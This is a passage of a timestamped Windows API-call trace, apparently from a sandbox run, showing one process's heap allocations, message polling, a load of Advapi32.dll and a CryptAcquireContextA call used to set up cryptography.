returned 0x2e50d88 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0228.792] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0228.792] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0228.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0228.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0228.792] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0228.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0228.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0228.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0228.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0228.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0228.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0228.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0228.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0228.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0228.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.794] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0228.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.795] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0228.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.795] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0228.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0228.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0228.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0228.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0228.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0228.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0228.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0228.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0228.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0228.801] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.801] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0228.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0228.802] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0228.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.802] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0228.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0228.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.803] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0228.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0228.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0228.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0228.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0228.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0228.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.803] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0228.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.804] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0228.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0228.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0228.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0228.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0228.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0228.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0228.804] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0228.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0228.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0228.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0228.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0228.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0228.851] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0228.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0228.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.852] 